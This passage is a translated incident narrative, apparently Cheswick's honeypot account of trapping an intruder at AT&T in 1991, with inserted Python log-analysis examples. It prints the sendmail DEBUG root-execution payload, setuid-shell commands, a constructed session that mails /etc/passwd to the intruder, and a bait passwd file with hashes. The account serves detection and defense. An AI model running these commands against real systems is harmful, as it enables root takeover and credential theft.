One Night with Berferd
Translation: Song Chuanhua
Student ID: 19808031
I dedicate this article to those who already are, or are about to become, hackers. I hope you will pay attention to your own security while cracking others. :)
On 7 January 1991 a hacker, convinced that he had discovered the sendmail DEBUG hole on our Internet gateway machine, tried to obtain a copy of our password file. I sent him one.
For several months we led the hacker on a merry chase of cheerful attempts so that we could trace his location and learn his cracking techniques. This article is a detailed record of the hacker's "successes" and failures, and of the bait and traps we used.
Our conclusion is that this hacker had a great deal of time and persistence, and a good list of known system holes. Once he had a legitimate login on a system, those holes let him easily break into the uucp and bin accounts, and from there into root. Our hacker was very interested in military targets and in new machines that could help him launder his connections.
Introduction
Our secure Internet gateway went into service in January 1990. I wanted to know how often the castle door would be attacked. I knew there were people on the Internet who like to try brute force. Who were they? Where would they attack from? How often? Which system holes would they try most often?
In fact they did not break into AT&T, and they rarely even came to our door, so the greatest pleasure left to us was this: lure a hacker into a well-designed environment, record everything he does, study his actions, and warn his next target.
Most workstations on the Internet provide few tools for this. Commercial systems detect and report some problems, but they miss a lot of what we wanted. Our gateway generates about 10 MB of log files every day. But what about attacks on services that do not write logs at all?
We added some fake services to the system, and I wrote a script that goes through each day's logs and checks the following:
FTP: the report lists every user name that logged in or was attempted each day. It also reports any use of a tilde (an old ftpd hole), every access to /etc/passwd and /etc/group under the ftp directory, and every fetch of a complete file listing of the pub directory. It is common to take the passwd file, use it to learn the login names of the system's legitimate users, and then attack and crack their passwords; some system administrators even put the real passwd file in ftp/etc. We forged a passwd file whose passwords, once cracked, read "why are you wasting your time".
Telnet/login: every login attempt is recorded. That makes it easy to see that someone is trying many accounts or hammering on one particular account. Since there are no users on the Internet gate other than the "guard", problems are easy to spot.
Guest/visitor accounts: the first public accounts a hacker looks for. These accounts give friendly, easy access to almost every system file, including passwd. A hacker can also obtain the list of hosts a machine trusts by fetching /etc/hosts.equiv or each user's .rhosts file. The login scripts of these accounts on our gateway read as follows:
    exec 2>/dev/null            # ensure that stderr doesn't appear
    trap "" 1
    /bin/echo
    (/bin/echo "Attempt to login to inet with $LOGNAME from $CALLER" |
        upasname=adm /bin/mail ches dangelo &
    ) 2>&1 | mail ches dangelo
    /bin/echo "/tmp full"
    sleep 5                     # I love to make them wait....
    /bin/echo "/tmp full"
    /bin/echo "/tmp full"
    /bin/echo
    sleep 60                    # ... and simulating a busy machine is useful
We had to be careful that the caller never saw a system error message (which would happen if our script had a bug). Note that $CALLER is the host name or IP address at the other end; it is supplied as an environment variable by a modified telnetd or login.
SMTP DEBUG: this is a trap for the sendmail DEBUG hole. Although almost every vendor has closed it, hackers still try it occasionally. The hole lets an outsider run a script as root. When someone tries it, I get a copy of the script he tried to run.
Finger: finger gives a hacker a lot of useful information: account names, when each account was last used, and details that help in guessing passwords. Since our organization does not allow such information out, we put a program behind fingerd that fingers the caller and then rejects the request. (Of course we avoid endless loops of finger requests between the caller and ourselves.) The reports show dozens of finger requests a day, most of them legitimate.
rlogin/rsh: these commands rely on unconditional trust between systems and are not supported on our machines. But we do report attempts to use them, with a finger of the caller and the user names tried.
Many of the detectors above use the finger command to identify the machine and user that called them.
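The daily checks listed above, written out as an added example (this is not Cheswick's own retrieval script). The syslog-style ftpd and login line formats are an assumption, and the sample log lines are constructed for the example, with the host names taken from the article:

```python
"""Daily log review in the spirit of the page's retrieval script.

Added example, not the original tool. Assumed log formats: a syslog-style
ftpd log that records the connecting host and the USER/RETR/CWD/LIST
commands per process id, and a login log of FAILED LOGIN records.
"""
import re
from collections import defaultdict

# Constructed sample logs (not real gateway data).
FTP_LOG = """\
Jan 15 18:40:02 inet ftpd[201]: connection from embezzle.stanford.edu
Jan 15 18:40:05 inet ftpd[201]: USER anonymous
Jan 15 18:40:09 inet ftpd[201]: RETR /etc/passwd
Jan 15 18:41:12 inet ftpd[201]: CWD ~ches
Jan 15 18:42:30 inet ftpd[201]: LIST pub
Jan 15 19:02:44 inet ftpd[233]: connection from math.sdsu.edu
Jan 15 19:02:48 inet ftpd[233]: USER ftp
Jan 15 19:03:01 inet ftpd[233]: RETR etc/passwd
Jan 15 19:03:30 inet ftpd[233]: RETR pub/README
"""

LOGIN_LOG = """\
Jan 15 18:50:10 inet login: FAILED LOGIN 1 FROM embezzle.stanford.edu FOR guest
Jan 15 18:50:21 inet login: FAILED LOGIN 2 FROM embezzle.stanford.edu FOR root
Jan 15 18:50:40 inet login: FAILED LOGIN 3 FROM embezzle.stanford.edu FOR uucp
Jan 15 21:12:03 inet login: FAILED LOGIN 1 FROM hostx.example.mil FOR ches
"""

FTP_RE = re.compile(r"^\w{3}\s+\d+ [\d:]+ \S+ ftpd\[(\d+)\]: (.*)$")
LOGIN_RE = re.compile(r"FAILED LOGIN \d+ FROM (\S+) FOR (\S+)")
SENSITIVE = {"passwd", "group"}


def ftp_events(log):
    """Yield (host, verb, argument) per FTP command, attributing each ftpd
    process id to the host that opened the connection."""
    host_of = {}
    for line in log.splitlines():
        m = FTP_RE.match(line)
        if not m:
            continue
        pid, rest = m.groups()
        if rest.startswith("connection from "):
            host_of[pid] = rest.split()[-1]
            continue
        verb, _, arg = rest.partition(" ")
        yield host_of.get(pid, "?"), verb, arg


def ftp_report(log):
    """The FTP checks from the article: user names per host, fetches of
    passwd/group out of the ftp tree, tilde use, full listings of pub."""
    users = defaultdict(list)
    report = {"passwd_fetches": [], "tilde_use": [], "pub_listings": []}
    for host, verb, arg in ftp_events(log):
        if verb == "USER" and arg not in users[host]:
            users[host].append(arg)
        if "~" in arg:
            report["tilde_use"].append((host, arg))
        parts = arg.strip("/").split("/")
        if verb == "RETR" and parts[-1] in SENSITIVE and "etc" in parts[:-1]:
            report["passwd_fetches"].append((host, arg))
        if verb == "LIST" and parts[0] == "pub":
            report["pub_listings"].append(host)
    report["users"] = dict(users)
    return report


def login_report(log):
    """Failed login attempts as host -> {account: count}."""
    attempts = defaultdict(lambda: defaultdict(int))
    for line in log.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            host, user = m.groups()
            attempts[host][user] += 1
    return {h: dict(u) for h, u in attempts.items()}


def account_guessing(attempts, min_accounts=3):
    """Hosts that tried several different accounts: on a gate with no real
    users this is the pattern the article says is easy to spot."""
    return sorted(h for h, u in attempts.items() if len(u) >= min_accounts)


def daily_report(ftp_log, login_log):
    """Text summary in the style of the morning report."""
    f = ftp_report(ftp_log)
    lines = ["ftp users from %s: %s" % (h, ", ".join(u))
             for h, u in sorted(f["users"].items())]
    lines += ["%s fetched %s" % (h, p) for h, p in f["passwd_fetches"]]
    lines += ["%s used tilde: %s" % (h, a) for h, a in f["tilde_use"]]
    lines += ["%s listed pub" % h for h in f["pub_listings"]]
    lines += ["%s tried several accounts" % h
              for h in account_guessing(login_report(login_log))]
    return "\n".join(lines)


if __name__ == "__main__":
    print(daily_report(FTP_LOG, LOGIN_LOG))
```

The passwd check deliberately matches both "/etc/passwd" and "etc/passwd", since a client can name the file either way relative to the ftp root; the tilde check fires on any argument, because the old ftpd hole was in how the path was expanded, not in one particular command.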
When an attempt looks illegitimate, I send a message like this one:
To: inetfans postmaster@sdsu.edu

Yesterday someone from math.sdsu.edu fetched the /etc/passwd file
from our FTP directory. The file is not important, but these probes
are sometimes performed from stolen accounts.

Just thought you'd like to know.

Bill Cheswick
This is a typical letter sent to "inetfans", a list of people from the Computer Emergency Response Team (CERT), various interest groups, and people who care about particular sites.
Many system administrators pay close attention to these reports, especially at military sites, and most are very cooperative in resolving the problem. The responses have included apologies, denials, account suspensions, and silence. When a site openly supports hacker activity, we consider refusing all packets from it.
Unfriendly acts
We have had these detectors in place since January 1990. The statistics show that the attack rate goes up during school holidays every year. Our attack rate may be higher than that of other sites, because we are widely known and thought of as "the telephone company".
Not every remote user who fetches the passwd file has malicious intent; sometimes they just want to see whether the transfer works.
This is the log of the SMTP session. These seemingly cryptic logs usually record two mailers talking to each other; in this case the other end is a person typing commands. The first command he tried was DEBUG. He must have been pleasantly surprised by the "250 OK" response. The key line is "rcpt to:". The part enclosed in angle brackets is normally the address of a mail recipient; here it contains a command line, which sendmail in DEBUG mode runs as root:
    sed -e '1,/^$/d' | /bin/sh; exit 0"
This strips off the mail header and executes the body of the message as root. The message was mailed to me, and my log recorded it with its timestamp:
He wanted us to mail him a copy of our passwd file, probably to run a password cracker on it. All of these attempts came from a user adrian on EMBEZZLE.STANFORD.EDU, half an hour after the U.S. air strikes on Iraq began, and he made no effort to hide it. I suspected that Saddam had hired a hacker or two. I happened to have a fake passwd file in the ftp directory, and I sent it to Stanford as root.
The next morning I heard from Stanford that they knew about it and were investigating. They said the account had been stolen.
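The DEBUG exchange and the header-stripping sed command described above, as an added example that is not code from the original article: a small analyzer that reads a captured SMTP session, flags the DEBUG command, pulls the program recipient out of the rcpt to: brackets, and recovers the message body the way sed -e '1,/^$/d' would. The "<<< " and ">>> " transcript markers are an assumed format, and the session itself is constructed; its body is taken to be a mail command sending /etc/passwd to adrian, which is what the article says the hacker was after.

```python
"""Analyzer for a captured sendmail DEBUG session.

Added example, not from the original article. Assumptions: the transcript
format (remote side marked "<<< ", our replies ">>> ") and the session
below are constructed; the body is the passwd-mailing command the page
says the hacker wanted run.
"""
import re

# Constructed transcript of the kind of session the DEBUG trap would log.
SESSION = """\
<<< HELO embezzle.stanford.edu
>>> 250 inet Hello embezzle.stanford.edu, pleased to meet you
<<< DEBUG
>>> 250 OK
<<< mail from:<root>
>>> 250 Sender ok
<<< rcpt to:<"| sed -e '1,/^$/d' | /bin/sh; exit 0">
>>> 250 Recipient ok
<<< data
>>> 354 Enter mail, end with "." on a line by itself
<<< From: root
<<< To: root
<<<
<<< /bin/mail adrian@embezzle.stanford.edu </etc/passwd
<<< .
>>> 250 Ok
"""

RCPT_RE = re.compile(r"^rcpt to:\s*<(.*)>\s*$", re.IGNORECASE)


def client_lines(session):
    """Only what the remote side typed, with the '<<< ' marker removed."""
    return [line[4:] for line in session.splitlines() if line.startswith("<<<")]


def rcpt_command(address):
    """A recipient of the form "|cmd" names a program, not a mailbox.
    Return the command without quotes and the leading pipe, else None."""
    addr = address.strip().strip('"')
    if addr.startswith("|"):
        return addr[1:].strip()
    return None


def strip_header(message):
    """Same effect as sed -e '1,/^$/d': delete everything through the first
    blank line, leaving the body that would have been piped to /bin/sh."""
    lines = message.splitlines()
    for i, line in enumerate(lines):
        if line == "":
            return "\n".join(lines[i + 1:])
    return ""  # no blank line at all: sed deletes to end of input


def analyze(session):
    """Flag a DEBUG attempt and recover the command and script it carried."""
    result = {"debug": False, "commands": [], "script": ""}
    message, in_data = [], False
    for cmd in client_lines(session):
        if in_data:
            if cmd == ".":
                in_data = False
            else:
                message.append(cmd)
            continue
        if cmd.upper() == "DEBUG":
            result["debug"] = True
        m = RCPT_RE.match(cmd)
        if m and rcpt_command(m.group(1)):
            result["commands"].append(rcpt_command(m.group(1)))
        if cmd.lower() == "data":
            in_data = True
    result["script"] = strip_header("\n".join(message))
    return result


if __name__ == "__main__":
    r = analyze(SESSION)
    if r["debug"]:
        print("DEBUG attempt; recipient command:", r["commands"])
        print("script the hacker wanted run as root:")
        print(r["script"])
```

The point of the trap is visible in analyze(): the script is fully recoverable from the session log before anything is executed, so a trapped DEBUG gives the defender the attacker's exact intent for free.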
The following Sunday I received a letter from France:
To: root@research.att.com
Subject: intruder
Date: Sun 20 Jan 91 15:02:53 +0100

I have just closed an account on my machine
which has been broken into by an intruder coming from embezzle.stanford.edu. He
(she) has left a file called passwd. The contents are:
------------>
From root@research.att.com Tue Jan 15 18:49:13 1991
Received: from research.att.com by embezzle.Stanford.EDU (5.61/4.7);
        Tue, 15 Jan 91 18:49:12 -0800
Message-Id: <9101160249.AA26092@embezzle.Stanford.EDU>
From: root@research.att.com
Date: Tue 15 Jan 91 21:48 EST
To: adrian@embezzle.stanford.edu
Status: R

root:mgajqD9nOAVDw:0:2:0000-Admin(0000):/:
daemon:*:1:1:0000-Admin(0000):/:
bin:*:2:2:0000-Admin(0000):/bin:
sys:*:3:3:0000-Admin(0000):/usr/v9/src:
adm:*:4:4:0000-Admin(0000):/usr/adm:
uucp:*:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:*:10:10:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
ftp:anonymous:71:14:file transfer:/:no soap
ches:j2PPWsiVal..Q:200:1:me:/u/ches:/bin/sh
dmr:a98tVGlT7GiaM:202:1:Dennis:/u/dmr:/bin/sh
rtm:5bHD/k5k2mTTs:203:1:Rob:/u/rtm:/bin/sh
berferd:deJCw4bQcNT3Y:204:1:Fred:/u/berferd:/bin/sh
td:PXJ.d9CgZ9DmA:206:1:Tom:/u/td:/bin/sh
------------
Please let me know if you have heard of him.
One night with Berferd
A few minutes later, someone used the DEBUG hole again to run commands as root. This time he tried to modify our passwd file and to leave himself a setuid-root shell:
    cp /bin/sh /tmp/shell
    chmod 4755 /tmp/shell
The connection again came from EMBEZZLE.STANFORD.EDU.
What should I do? I did not want him to actually get an account on the gateway. Why invite him in? If I did, I would have no record of his keystrokes.
I wanted to keep him on the hook and see what else he would try. Perhaps I could simulate the operating system by hand. That meant I would have to make him believe the machine was slow, since I could not keep up with a MIPS M/120. It also meant I had to simulate a consistent operating system.
I had already made one decision when I sent him the passwd file:
Decision 1: the ftp passwd file is the real passwd file.
Two more followed:
Decision 2: the gateway machine is badly administered (it has the DEBUG hole, and its passwd file sits in the ftp directory).
Decision 3: the gateway machine is extremely slow.
So I decided to let him think he had changed the pass